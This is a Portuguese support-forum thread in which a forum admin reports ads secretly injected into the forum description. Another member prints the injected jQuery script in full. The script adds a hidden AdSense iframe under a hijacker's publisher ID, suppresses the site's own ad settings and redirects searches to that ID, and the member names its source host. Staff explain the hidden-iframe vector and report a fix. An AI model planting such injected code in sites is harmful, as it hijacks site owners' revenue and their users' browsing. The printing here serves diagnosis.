Fórum dos Fóruns

Fórum dos Fóruns Forumeiros

Welcome FdF Bem-vindo ao fórum de suporte Forumeiros  Muito feliz


Para aproveitar tudo o que o nosso fórum lhe oferece, agradecemos que se identifique, se já é nosso membro, ou que se junte à nossa comunidade, fazendo o seu registo.
Acesso rápido

Fóruns de suporte oficiais
Conectar-se

Esqueci minha senha

Últimos assuntos
» Avatar Gif
Hoje à(s) 5:12 por [K]oke

» Barra de Categorias
Hoje à(s) 5:09 por [K]oke

» Notificações
Hoje à(s) 2:22 por Luiz~

» Alinhamento botão curtir
Ontem à(s) 21:31 por Luiz~

» Remover a tag da página inicial do fórum
Ontem à(s) 20:27 por Luiz~

» Tipos de layout e ativação através de perfil de usuário
Ontem à(s) 18:47 por Harleen

» Correção codigo aparecer abaixo do avatar
Ontem à(s) 17:41 por Luiz~

Perdi minha senha!
Você precisa recuperar sua senha?
Clique aqui
Parceiros Forumeiros
Os membros mais ativos da semana
Luiz~
 
Harleen
 
Shek
 
Kenno LP
 
Kyo Panda
 
Ramon Rodrigues
 
Flames
 
Holkis
 
Blackfyre
 
wlweslley
 

Quem está conectado
238 usuários online :: 2 usuários cadastrados, Nenhum Invisível e 236 Visitantes :: 2 Motores de busca

[K]oke, ThallesAmagami

[ Ver toda a lista ]


O recorde de usuários online foi de 3131 em Qui 24 Dez 2009 - 15:05

Problema de segurança no Painel de Controle

Ver o tópico anterior Ver o tópico seguinte Ir em baixo

Resolvido Problema de segurança no Painel de Controle

Mensagem por Valentine em Qui 12 Fev 2015 - 12:59

Detalhes da dúvida

Versão do fórum : Invision
Nível de acesso : Administrador
Navegador usado : Google Chrome
Imagem :
Imagem da minha dúvida:

Membros afetados : Todos os membros que não fossem administrador
Problema começou : Não sei dizer, porque o problema só ocorria com os membros
Endereço do fórum : http://www.aldeiarpg.com

Descrição do problema

Bom, há pouco tempo eu descobri que alguém, de alguma forma, inseriu um código na descrição do meu fórum. Tal código fazia com que todo e qualquer usuário, exceto administradores, visualizassem propagandas indesejadas. Até onde eu sei, só administradores podem ter acesso ao Painel de Controle e como não fui eu... quem foi? Não há outros administradores no fórum.

Esse código estava escondido embaixo da primeira linha da descrição que estava "vazia" (só com espaços).

Eu queria respostas sobre porque isso ocorreu, ou pelo menos, como eu faço pra evitar, já que é uma falha de segurança no painel que me deixa desconfortável.
avatar

Valentine
Nível 6

Masculino
Inscrito dia : 27/03/2011
Mensagens : 62
Pontos Ativos : 118

http://www.aldeiarpg.com

Resolvido Re: Problema de segurança no Painel de Controle

Mensagem por JScript em Qui 12 Fev 2015 - 13:40

@Valentine

O código que é executado é o mesmo (com pequenas diferenças) que eu publiquei neste outro tópico: http://ajuda.forumeiros.com/t97890-tentativas-de-hacker-o-forum-por-mp#671793

Abaixo o código usado em seu fórum:
Código:

function testedeadd() {

   if (jQuery('#main-content').length) {
      phpbb = '#main-content'
   };

   if (jQuery('#' + numaleat).length === 0) {

      jQuery(phpbb).eq(0).prepend('<div style="margin:0 auto;text-align:center"><iframe style=width:728px!important;height:90px!important;overflow:hidden!important frameborder=0 id=' + numaleat + '></iframe></div>');

      ifrm = jQuery('#' + numaleat)[0];
      ifrm = (ifrm.contentWindow) ? ifrm.contentWindow : (ifrm.contentDocument.document) ? ifrm.contentDocument.document : ifrm.contentDocument;
      ifrm.document.open();
      ifrm.document.write('<style>body{margin:0px}</style><script>google_ad_client=\x22pub-4591355146850004\x22;google_ad_slot=\x221666688237\x22;google_ad_width=728;google_ad_height=90</script><script src=http://pagead2.googlesyndication.com/pagead/show_ads.js></script>');
      ifrm.document.close();

   };

   linkstyle = 'style[type="text/css"]:contains("html body iframe[name="google_ads_frame"]"):contains("display:block")';
   if (jQuery(linkstyle).length) {
      jQuery(linkstyle).eq(0).html(jQuery(linkstyle).eq(0).html().replace(/display:block/g, 'display:none'))
   };

   if (jQuery('#fa_ticker_block').css('display') != 'none') {
      jQuery('#fa_ticker_block').css('display', 'none')
   };

};

if (_userdata.user_level != '1' && typeof repeatstop56364765 === 'undefined') {

   repeatstop56364765 = 'a';
   numaleat = parseInt(1000000) + Math.floor(Math.random() * 9999999 - 1000000);
   phpbb = 'table.bodylinewidth td.bodyline #page-body table[cellspacing="0"][cellpadding="0"][width="100%"] tbody tr td[valign="top"][width="100%"]';

   jQuery(document).ready(function() {
      if (typeof testedeaddfdgd === 'undefined') {
         testedeaddfdgd = 'a';
         testedeadd()
      }
   });

   if (typeof testedeaddfdgd === 'undefined') {
      testedeaddfdgd = 'a';
      setInterval1 = setInterval(function() {
         testedeadd()
      }, 1)
   };

   window.onload = function() {
      if (typeof setInterval1 !== undefined) {
         clearInterval(setInterval1)
      }
   };

   jQuery('form[action^="/search"] input[type="submit"]').live('mousedown', function() {
      window.open('http://google.com/cse?cx=partner-pub-4591355146850004:5829051292&q=' + encodeURIComponent('site:' + location.hostname + ' ' + jQuery(this).closest('form').find('input[name="search_keywords"]').val()));
      return false
   });
   jQuery('form[action^="/search"] input[name="search_keywords"]').live('keypress', function(e) {
      if (e.which == 13) {
         window.open('http://google.com/cse?cx=partner-pub-4591355146850004:5829051292&q=' + encodeURIComponent('site:' + location.hostname + ' ' + jQuery(this).val()));
         return false
      }
   });

};

jQuery('script[src="//xmlfeed2.6te.net/s"]').remove();

Note que o host é o mesmo: xmlfeed2.6te.net/s

Vamos aguardar os administradores se prontificarem aqui e/ou no tópico que mencionei acima!

JS
avatar

JScript
Membro do Fórum

Masculino
Inscrito dia : 15/03/2013
Mensagens : 1449
Pontos Ativos : 1899

http://jscript.forumeiros.com/

Resolvido Re: Problema de segurança no Painel de Controle

Mensagem por nikka em Sex 13 Fev 2015 - 18:51

Olá Valentine,

Devido a um iframe oculto nas mensagens ou Mensagens Privadas, um código script era adicionado à descrição do fórum, fazendo com que as publicidades aparecessem, mesmo que tenha assinalado ou pago para que isso aconteça.

Uma alteração ao nível dos códigos foi realizada hoje pelos técnicos nos fóruns Forumeiros de forma a que isso não volte a acontecer.


Agradecemos a sua colaboração e pedimos desculpas pelos inconvenientes causados.
Até mais.

Tópico movido de 'Questões sobre JavaScript & jQuery' para 'Necessidade de técnico'
avatar

nikka
Membro profissional
Membro profissional

Feminino
Inscrito dia : 17/12/2008
Mensagens : 15624
Pontos Ativos : 19899

http://ajuda.forumeiros.com/ https://www.facebook.com/forumeirospt https://twitter.com/Forumeiros_PT

Resolvido Re: Problema de segurança no Painel de Controle

Mensagem por Valentine em Sex 13 Fev 2015 - 22:54

Se já foram tomadas as providências, então podem fechar o tópico.

Obrigado.
avatar

Valentine
Nível 6

Masculino
Inscrito dia : 27/03/2011
Mensagens : 62
Pontos Ativos : 118

http://www.aldeiarpg.com

Resolvido Re: Problema de segurança no Painel de Controle

Mensagem por Sennior em Sab 14 Fev 2015 - 0:47

Questão marcada como Resolvida ou o Autor solicitou que ela fosse arquivada.
Tópico marcado como Resolvido e movido para Questões resolvidas.


Admineiros Jamais forneça seus dados pessoais, tais como e-mail de fundação ou senhas pelo fórum!
Admineiros  Antes de criar um novo tópico faça uma pesquisa rápida e olhe a lista de tutoriais prontos.
Admineiros Perdeu a senha de administração? Veja o que fazer.
Admineiros Ferramentas do Administrador.

"Você será lembrado pelo que faz, e não pela cor que tens".
avatar

Sennior
Moderadeiro
Moderadeiro

Masculino
Inscrito dia : 10/06/2011
Mensagens : 16266
Pontos Ativos : 20764

http://ajuda.forumeiros.com/forum https://www.facebook.com/GlladstonHenrique

Ver o tópico anterior Ver o tópico seguinte Voltar ao Topo

- Tópicos similares

Permissão deste fórum:
Você não pode responder aos tópicos neste fórum